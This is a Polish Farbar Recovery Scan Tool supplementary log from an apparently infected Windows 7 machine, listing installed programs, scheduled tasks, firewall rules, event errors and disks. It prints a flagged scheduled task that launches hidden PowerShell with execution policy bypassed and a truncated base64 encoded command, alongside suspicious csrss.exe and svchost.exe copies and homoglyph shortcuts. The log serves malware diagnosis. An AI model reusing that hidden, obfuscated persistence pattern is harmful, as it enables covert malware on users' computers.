Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 20-08-2017 Uruchomiony przez Tomek (04-09-2017 19:40:33) Uruchomiony z C:\Users\Tomek\Downloads Windows 7 Professional Service Pack 1 (X64) (2017-02-08 14:08:14) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-4185380531-2055773481-192677435-500 - Administrator - Disabled) Gość (S-1-5-21-4185380531-2055773481-192677435-501 - Limited - Disabled) Tomek (S-1-5-21-4185380531-2055773481-192677435-1000 - Administrator - Enabled) => C:\Users\Tomek ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-4185380531-2055773481-192677435-1000\...\uTorrent) (Version: 3.5.0.43916 - BitTorrent Inc.) Adobe Flash Player 26 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 26.0.0.151 - Adobe Systems Incorporated) DiRT Rally (HKLM\...\ZGlydHJhbGx5_is1) (Version: 1 - ) Ford Racing 3 (HKLM\...\Steam App 315600) (Version: - Razorworks) Ford Street Racing (HKLM\...\Steam App 306520) (Version: - Razorworks) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.113 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) 
Hidden Grand Theft Auto: San Andreas (HKLM\...\Steam App 12120) (Version: - Rockstar Games) Icy Tower v1.5.1 (HKLM-x32\...\Icy Tower v1.5.1_is1) (Version: - Free Lunch Design) Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) Mafia (HKLM-x32\...\Mafia) (Version: - ) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation) MoTeC M1 Tune 1.4 (HKLM-x32\...\{36CE56F1-CD72-441D-848F-4F53963A1377}) (Version: 7.00.7727 - MoTeC) Mozilla Firefox 54.0.1 (x64 pl) (HKLM\...\Mozilla Firefox 54.0.1 (x64 pl)) (Version: 54.0.1 - Mozilla) Need For Speed Underground (HKLM-x32\...\{A99968BE-C155-474C-0089-33239DEE1CE2}) (Version: - ) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.3 - NVIDIA Corporation) NVIDIA ForceWare Network Access Manager (HKLM-x32\...\InstallShield_{7CFA46E3-CC2F-4355-82AE-6012DC3633FD}) (Version: - ) NVIDIA Sterownik 3D Vision 320.49 
(HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 320.49 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.24.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.24.2 - NVIDIA Corporation) NVIDIA Sterownik graficzny 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 320.49 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 320.49 - NVIDIA Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Panel sterowania NVIDIA 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 320.49 - NVIDIA Corporation) Hidden SafeFinder (HKLM-x32\...\{01B19AE2-AD54-4656-850C-44B74C1B7534}) (Version: 1.0.0.0 - Linkury) <==== UWAGA Samsung ML-2010 Series (HKLM-x32\...\Samsung ML-2010 Series) (Version: - ) TP-LINK TL-WN881ND Driver (HKLM-x32\...\{FDA7E907-6539-42C1-9721-0239C281B336}) (Version: 1.3.1 - TP-LINK) Warblade (HKLM-x32\...\Warblade_is1) (Version: - EMV Software) WinRAR 5.40 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) 
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2013-06-21] (NVIDIA Corporation) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-09-19] (Alexander Roshal) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {498998F3-8859-449C-8509-6F6FD5BEF3BB} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_26_0_0_151_pepper.exe [2017-08-26] (Adobe Systems Incorporated) Task: {599E82B8-D789-4F16-9A12-C9F92DA9C484} - System32\Tasks\{513EE0BA-408A-448F-99C3-2E2385119AC4} => C:\Windows\system32\pcalua.exe -a D:\d\call\1\Mafia\mafia.exe -d D:\d\call\1\Mafia Task: {629A09E5-E9C2-4B12-89A1-3CAB51C689BC} - System32\Tasks\{6DBBCAF7-ED92-427B-A744-3831A426ABC7} => C:\Windows\system32\pcalua.exe -a "C:\Users\Tomek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall Task: {7AA882E6-8FA6-4779-9BC1-57ABAF5114AB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-08] (Google Inc.) 
Task: {80CD9417-A491-4EDF-9742-E12954077206} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2017-09-03] () <==== UWAGA Task: {82A1BDE8-14A0-4AC2-891F-F70E7B32D614} - System32\Tasks\{0E790D47-0E09-0A04-7E11-087F7E7F117A} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwAgACAAIAA7ACAAOwA7ADsAOwAgADsAOwAgACAAOwA7ACAAIAAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQA (dane wartości zawierają 9968 znaków więcej). <==== UWAGA Task: {E99535D1-00DB-451E-A2AF-3844409D7F4D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-08] (Google Inc.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr (64-bit).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) <==== Cyrillic Shortcut: C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) <==== Cyrillic Shortcut: C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlоrеr (Nо Аdd-оns).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) <==== Cyrillic Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Сhrоmе.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) 
<==== Cyrillic Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) <==== Cyrillic Shortcut: C:\Users\Public\Desktop\Gооglе Сhrоmе.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) <==== Cyrillic Shortcut: C:\Users\Public\Desktop\Моzillа Firеfох.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) <==== Cyrillic ==================== Załadowane moduły (filtrowane) ============== 2017-02-08 16:27 - 2013-06-21 12:23 - 000087328 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2017-05-11 06:58 - 2006-12-04 01:26 - 000022016 _____ () C:\Windows\System32\SUGS2l6.dll 2017-09-03 12:57 - 2017-09-03 12:57 - 000406208 _____ () C:\ProgramData\clsid45053.exe 2017-06-12 10:34 - 2017-06-12 10:34 - 000075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2017-09-03 12:57 - 2017-09-03 12:57 - 000177152 _____ () C:\Windows\svchost.exe 2009-04-19 09:34 - 2009-04-19 09:34 - 000625184 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe 2009-04-19 09:34 - 2009-04-19 09:34 - 000070176 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nv_common.dll 2009-04-19 09:34 - 2009-04-19 09:34 - 000578080 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\SpecialCase.dll 2009-04-19 09:34 - 2009-04-19 09:34 - 000207904 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe 2016-11-27 21:39 - 2017-08-04 23:19 - 000678176 _____ () D:\steam\SDL2.dll 2016-11-27 21:39 - 2016-09-01 03:02 - 004969248 _____ () D:\steam\v8.dll 2016-11-27 21:39 - 2016-09-01 03:02 - 001563936 _____ () D:\steam\icui18n.dll 2016-11-27 21:39 - 2016-09-01 03:02 - 001195296 _____ () D:\steam\icuuc.dll 2016-11-27 21:39 - 2017-08-28 22:05 - 002505504 _____ () D:\steam\video.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 002549760 _____ () D:\steam\libavcodec-56.dll 
2016-11-27 21:39 - 2016-01-27 09:49 - 000442880 _____ () D:\steam\libavutil-54.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 000491008 _____ () D:\steam\libavformat-56.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 000332800 _____ () D:\steam\libavresample-2.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 000485888 _____ () D:\steam\libswscale-3.dll 2016-11-27 21:39 - 2017-08-28 22:05 - 000885024 _____ () D:\steam\bin\chromehtml.DLL 2016-11-27 21:39 - 2016-07-05 00:17 - 000266560 _____ () D:\steam\openvr_api.dll 2016-12-30 17:06 - 2017-07-18 00:50 - 073115424 _____ () D:\steam\bin\cef\cef.win7\libcef.dll 2017-06-08 23:00 - 2017-05-17 03:54 - 000678176 _____ () D:\steam\bin\cef\cef.win7\SDL2.dll 2016-11-27 21:39 - 2015-09-25 01:52 - 000119208 _____ () D:\steam\winh264.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 
2009-07-14 04:34 - 2017-09-03 12:57 - 000001293 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-4185380531-2055773481-192677435-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{5F05122D-06F6-43F8-9C09-1C42D3FBCFA3}] => (Allow) D:\steam\Steam.exe FirewallRules: [{9CC28351-3F1B-4D44-8DE4-4F456FC88EE1}] => (Allow) D:\steam\Steam.exe FirewallRules: [{5D40C377-216D-43DA-A122-B1B9CE0E3243}] => (Allow) D:\steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{87C5DD9E-25A4-40D6-9AEA-D7ADA81497C0}] => (Allow) D:\steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [TCP Query User{05D5603C-8AF6-47EF-95A6-6CB290351AD8}D:\steam\steamapps\common\counter-strike global offensive\csgo.exe] => (Allow) D:\steam\steamapps\common\counter-strike global offensive\csgo.exe FirewallRules: [UDP Query User{9A9C4CE7-42E5-4B7B-8B99-7C4933694BBA}D:\steam\steamapps\common\counter-strike global offensive\csgo.exe] => (Allow) D:\steam\steamapps\common\counter-strike global offensive\csgo.exe FirewallRules: [{5781CCCB-E54F-479B-8BD8-4998DB4CDCCE}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{1BC40D81-AD21-40DA-88E8-2D86B7CB9A3D}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{305D4CD7-592D-46E7-B5BC-5F3EBA385CAB}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{18023164-090E-4C3A-97D8-7BEB00B0F803}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{4CFDB65E-F283-4006-89F9-DA5DF44AC218}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{4A816AA0-8B40-485C-A6AD-1C04D4DC152C}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [TCP Query User{EAD949E8-87FF-401A-9680-3DC07B20F241}D:\gry\cod\call of duty modern warfare\iw3mp.exe] => (Allow) D:\gry\cod\call of duty modern warfare\iw3mp.exe FirewallRules: [UDP Query User{A05408F5-DEF6-48D2-9697-8B7E897367F7}D:\gry\cod\call of duty modern warfare\iw3mp.exe] 
=> (Allow) D:\gry\cod\call of duty modern warfare\iw3mp.exe FirewallRules: [TCP Query User{C7B3F808-81C2-4E68-895A-3719AD3BDC1D}D:\steam\steamapps\common\half-life\hl.exe] => (Allow) D:\steam\steamapps\common\half-life\hl.exe FirewallRules: [UDP Query User{95808FD6-D9B9-44AE-8B42-60E329E01E37}D:\steam\steamapps\common\half-life\hl.exe] => (Allow) D:\steam\steamapps\common\half-life\hl.exe FirewallRules: [{B82E4D46-1860-449D-9302-38C2C9DB0523}] => (Allow) D:\steam\steamapps\common\Grand Theft Auto San Andreas\gta-sa.exe FirewallRules: [{3A7C4FDD-4FC9-4F83-A0A7-320AA496CB39}] => (Allow) D:\steam\steamapps\common\Grand Theft Auto San Andreas\gta-sa.exe FirewallRules: [TCP Query User{81285A46-ABDD-435B-AB11-781B6BCA51E4}D:\gry\counter-strike clean edition\hl.exe] => (Allow) D:\gry\counter-strike clean edition\hl.exe FirewallRules: [UDP Query User{40D02124-EBE6-421E-9324-1B38D87BB913}D:\gry\counter-strike clean edition\hl.exe] => (Allow) D:\gry\counter-strike clean edition\hl.exe FirewallRules: [TCP Query User{4680EC59-D5C2-45D0-8A59-2C6F68BA06A8}D:\programy\motec\discovery\1.0\motec.discovery.exe] => (Allow) D:\programy\motec\discovery\1.0\motec.discovery.exe FirewallRules: [UDP Query User{1D753EEF-9D0C-4913-8A8C-54309F46E544}D:\programy\motec\discovery\1.0\motec.discovery.exe] => (Allow) D:\programy\motec\discovery\1.0\motec.discovery.exe FirewallRules: [{FABC06CD-CE86-4ED8-8836-263174264395}] => (Allow) D:\steam\steamapps\common\Ford Street Racing\fsr.exe FirewallRules: [{A682C782-5D9B-4338-B9FC-25E89E56819C}] => (Allow) D:\steam\steamapps\common\Ford Street Racing\fsr.exe FirewallRules: [{CBD28251-58BB-4831-82B5-F46FE2917141}] => (Allow) D:\steam\steamapps\common\Ford Racing 3\fr3.exe FirewallRules: [{A49B1AEE-8FE2-4C68-B713-72F17D453630}] => (Allow) D:\steam\steamapps\common\Ford Racing 3\fr3.exe FirewallRules: [{66A26559-B76D-4320-B5F8-4B3A28D25251}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{84CD8115-351B-4C5E-A9E6-B2DA9518F6CD}] => 
(Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{26D00ADF-5D93-48B8-9997-BD519F097CFC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{B0BC1F9E-BAF7-4746-AFEF-61AFCCA753A2}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{7BA01948-8F8D-4554-A0ED-C4B6EF74C54C}] => (Allow) C:\Users\Tomek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{6A21CB30-180E-4B2A-8CA9-CCD12B1464BA}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{AA0FEC1C-CC0B-4689-8A60-69D378A54C78}] => (Allow) C:\Users\Tomek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe ==================== Punkty Przywracania systemu ========================= 04-09-2017 19:14:44 Removed Online Application ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: wfcre Description: wfcre Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: wfcre Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. 
==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (09/04/2017 07:36:39 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/04/2017 07:35:01 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Error: (09/04/2017 07:35:01 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Wystąpił błąd aktywacji licencji (slui.exe), kod błędu: 0x800401F9 Error: (09/04/2017 07:31:46 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/04/2017 07:30:09 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Error: (09/04/2017 07:30:09 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Wystąpił błąd aktywacji licencji (slui.exe), kod błędu: 0x800401F9 Error: (09/04/2017 07:14:52 PM) (Source: SideBySide) (EventID: 59) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe". Błąd w pliku manifestu lub w pliku zasad "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe.Config" w wierszu 0. Nieprawidłowa składnia XML. 
Error: (09/04/2017 07:14:35 PM) (Source: SideBySide) (EventID: 59) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe". Błąd w pliku manifestu lub w pliku zasad "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe.Config" w wierszu 0. Nieprawidłowa składnia XML. Error: (09/04/2017 07:10:45 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/04/2017 07:09:02 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Dziennik System: ============= Error: (09/04/2017 07:35:25 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: wfcre Error: (09/04/2017 07:35:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Windows Defender Helper Service (Windows 1703 Creators Update) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (09/04/2017 07:34:09 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} nie zarejestrował się w modelu DCOM w wymaganym czasie. 
Error: (09/04/2017 07:30:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: wfcre Error: (09/04/2017 07:30:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Windows Defender Helper Service (Windows 1703 Creators Update) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (09/04/2017 07:09:15 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: wfcre Error: (09/04/2017 07:09:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Windows Defender Helper Service (Windows 1703 Creators Update) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (09/04/2017 07:05:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Ochrona oprogramowania niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 120000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (09/04/2017 07:05:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Windows Defender Helper Service (Windows 1703 Creators Update) niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (09/04/2017 07:05:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa ForceWare IP service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. CodeIntegrity: =================================== Date: 2017-09-04 19:34:57.925 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. 
Date: 2017-09-04 19:30:40.145 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:30:40.114 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:30:08.605 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2017-09-04 19:10:03.374 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:10:03.265 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:08:58.268 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. 
Date: 2017-09-04 19:00:44.984 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2017-09-04 18:53:35.981 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 18:53:35.950 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Statystyki pamięci =========================== Procesor: AMD Phenom(tm) II X3 720 Processor Procent pamięci w użyciu: 40% Całkowita pamięć fizyczna: 4095.24 MB Dostępna pamięć fizyczna: 2429.84 MB Całkowita pamięć wirtualna: 8188.68 MB Dostępna pamięć wirtualna: 6266.51 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:32.1 GB) (Free:9.04 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)] Drive d: (Nowy) (Fixed) (Total:116.82 GB) (Free:31.98 GB) NTFS Drive f: (MAFIA_CD_3) (CDROM) (Total:0.65 GB) (Free:0 GB) CDFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 148.9 GB) (Disk ID: CFEFCFEF) Partition 1: (Active) - (Size=32.1 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=116.8 GB) - (Type=OF Extended) ==================== Koniec Addition.txt ============================